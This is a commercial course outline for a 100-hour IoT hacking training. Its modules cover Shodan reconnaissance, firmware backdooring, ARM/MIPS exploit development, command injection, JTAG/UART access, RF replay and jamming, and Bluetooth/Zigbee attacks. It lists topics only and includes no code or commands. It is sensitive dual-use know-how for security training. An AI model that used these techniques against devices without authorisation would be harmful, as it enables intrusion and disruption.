The Internet of Things maps all physical devices, vehicles, weapons, home appliances and other items, embedded with electronics, software and sensors that have an IP address and network connectivity. This highly immersive and advanced training plan will cover the fundamentals of how IoT devices operate and communicate, and disclose what lies in the background of their physical set-up. Students will explore different methodologies of detecting vulnerabilities on these devices and learn how to exploit them on the hardware, software and application layers. Participants will exercise those techniques and will practice further using physical tools designed to help with the penetration process. The course also prepares attendees to master radio and Bluetooth exploitation methods, that are critical assets for IoT researchers. By completing the training, participants will have prominent skills and practical experience in the domain of IoT exploitation, and will be familiar with some of the most advanced tools and techniques on the market.

The course targets participants with a solid foundation knowledge in computer networking and information security, who wish to understand the world of IoT security. Primarily:

  • Penetration testers
  • Software engineers
  • Security researchers
  • IoT or ICS specialists
  • Solid knowledge and experience in infrastructure security and network penetration testing
  • Familiarity with Linux
  • Basic assembly
  • Familiarity with web-app penetration testing – an advantage
}

100 Hours

Cyber Security

h

Certificate: No

Price: contact us for more details

Leave your details

Course Outline

Objectives

  • Understanding IoT architecture and its different components in depth.
  • Learning how to locate vulnerabilities and exploit IoT devices on 3 different layes: hardware, software and application.
  • Extracting vendor information from examined IoT devices and injecting data into others.
  • Working with advanced tools to accomplish advanced tasks of IoT vulnerability discovery and exploitation.
  • Learning to deal with radio and Bluetooth technologies, that are highly popular in the IoT world, to extract transmitted information, intercept and contorl the traffic.

 

Hardware Requirements

The course requires the following hardware kit for each user or pair of users:

  • USB-TTL/FT232/BusPirate/Attify Badge
  • RTL-SDR
  • Arduino
  • A vulnerable device for hardware hacking
  • HackRF/Ubertooth

Note

The course includes a pre-prepared special virtual environment to serve as the IoT practice lab.

  

Course Outline

Module 1: Reconnaissance with Shodan – 4 hours

The first module will introduce participants to Shodan, the most comprehensive search engine for different types of computers and devices connected to the internet. Shodan allows multiple filtering techniques for locating IPs of various IoT devices, such as: servers, routers, webcams, etc. A decisive use of Shodan allows accessing a huge amount of valuable information on the target. During this module, students will become familiar with GUI and CLI uses of Shodan, learn how to use correct filtering to reach the desired database, and extract useful information for later exploitation.

  • Exploring Shodan
    • Graphic user interface
    • Command line interface
      • Using automation
      • Collecting data with advanced filtering
      • Extracting data
    • Mapping the internet
    • Mapping opertaing-systems, applications and IoT devices to specific vulnerabilities

 

Module 2: Introduction to IoT – 8 hours

The following module will introduce the world of IoT from the bottom up by explaining to participants how IoT systems are constructed, their detailed components and a full-scale mapping starting from the infrastructure level and up to the application aspect. Students will also set-up the virtual lab that will serve them during the course when identifying vulnerabilities on different IoT layers.

  • What is IoT
  • IoT file systems
  • IoT architectures
  • Tools used in IoT exploitation
  • Configuring the VM for IoT penetration testing
  • Introduction to embedded operating systems
  • Mapping the attack surface of an IoT device

 

Module 3: Firmware Analysis and Exploitation – 16 hours

The third module takes participants further into conducting full-scale analysis on IoT devices, by laying out the components of the system and locating vulnerabilities. At this stage, students will learn how to expose and extract vendor information embedded in the device, and alternatively, inject their own credentials or other types of information into it.  By the end of this stage, students will have acquired a substantial amount of information and skills to prepare them for more advanced stages in the following modules.

  • Mounting file systems
  • Firmware analysis
    • Using Binwalk
    • Identifying hardcoded vendor “secrets”
  • Emulating firmware binary
  • Backdooring a firmware
  • Running backdoored firmware
  • Firmware mod kit
  • Firmware analysis toolkit – using firmware emulation
  • Analyzing smart plugs
    • Reversing smart plug encryption
    • Exploiting smart plugs 

    Module 4: Software-Based Exploitation – 16 hours

    During this module, participants will dive deeper into advanced systems using MIPS. They will explore advanced attack-vectors, stemming from the device’s software itself, unrelated to vendor predefined settings. By the end of this stage, attendees will know how to exploit system vulnerabilities on both the hardware and software layers.

    • Common software exploitation techniques
    • Introduction to MIPS
    • Binary debugging
    • ARM buffer overflow
    • Exploitation with GDB on MIPS
    • Exploit development on ARM

     

    Module 5: Exploiting Web Application Vulnerabilities on IoT Devices – 16 hours

    After covering the IoT vulnerability landscape on the hardware and software layers, in the following module, students will examine the web-application side of IoT devices and explore for more vulnerabilities lying on this platform, that can also be a potential door to access the device and take over it.

    • OWASP IoT Top 10
    • Exploitation with Burp Suite
    • Exploitation using command injection
    • Exploitation using blind command injection
    • Exploitation using brute force
    • Exploitation with CSRF
    • Extracting vendor credentials

     

    Module 6: Using Physical Tools for IoT Exploitation – 16 hours

    During this module, students will practice with various physical tools designed for identifying vulnerabilities and exploiting IoT devices in a variety of manners. Participants will experience the work with these tools hands-on and try to penetrate a vulnerable IoT device.

    • Reconnaissance basics
    • Identifying serial interfaces
    • Identifying pinouts with multimeter
    • Shell access on the target device
    • Getting root access and extracting information
    • UART
    • NAND attack
    • JTAG
      • Identifying JTAG pinouts
      • Using JTAGulator
      • Debugging with JTAG
    • USB-TTL
    • RTL-SDR
    • Arduino
      • Reading and writing EEPROMs
    • HackRF

     

    Module 7: SDR (Software-Defined Radio) Based IoT Exploitation – 12 hours

    By using some tools that can analyze radio signals, students will identify and spot signals coming out of different devices and find out their purpose. Participants will analyze different protocols used by the device and decode the signals it broadcasts. This module will give participants an incredible amount of value by familiarizing them with the world of radio hacking.

    • Introduction to SDR
    • Radio communication analysis
    • Attacking protocols
    • Decoding AM signals
    • RTL-SDR
      • Capturing FM signals
      • Analyzing wireless signals
    • Extracting text from signals
    • Attacking RF (radio frequency)
      • Introduction to RF
      • RF traffic analysis
      • RF replay attack
      • Crafting RF messages
      • Jamming RF signals

     

    Module 8: BLE (Bluetooth Low Energy) and Zigbee – 12 hours

    Bluetooth is a highly widespread technology, used on a daily basis by multiple types of devices. During this module, participants will learn how to “eavesdrop” on Bluetooth communication, and see what it transmits. This knowledge will help to plan the next steps of attacking Bluetooth using various advanced frameworks. This module will also cover Zigbee, a widely used protocol similar to Bluetooth, that is extremely relevant to IoT devices and communication.

    • Introduction to Bluetooth
    • MiTM attacks
    • Bypassing authentication
    • Bluetooth cracking
    • Pairing modes
    • Sniffing with Ubertooth
    • Introduction to Zigbee
    • Zigbee exploitation